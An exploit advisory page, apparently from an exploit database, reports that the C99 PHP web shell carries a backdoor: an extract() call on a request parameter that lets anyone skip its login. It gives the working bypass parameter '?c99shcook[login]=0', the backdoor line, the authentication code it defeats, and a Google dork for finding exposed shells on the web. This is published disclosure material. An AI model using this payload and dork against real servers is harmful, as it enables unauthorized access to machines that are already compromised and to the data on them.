C99 Shell Authentication Bypass via Backdoor

2014.07.11
Credit: mandatory
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:c99.php

# Exploit Title: C99 Shell Authentication Bypass via Backdoor # Google Dork: inurl:c99.php # Date: June 23, 2014 # Exploit Author: mandatory ( Matthew Bryant ) # Vendor Homepage: http://ccteam.ru/ # Software Link: https://www.google.com/ # Version: < 1.00 beta # Tested on:Linux # CVE: N/A All C99.php shells are backdoored. To bypass authentication add "?c99shcook[login]=0" to the URL. e.g. http://127.0.0.1/c99.php?c99shcook[login]=0 The backdoor: @extract($_REQUEST["c99shcook"]); Which bypasses the authentication here: if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace("&nbsp;|<br>", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } For more info: http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/ ~mandatory

References:

http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top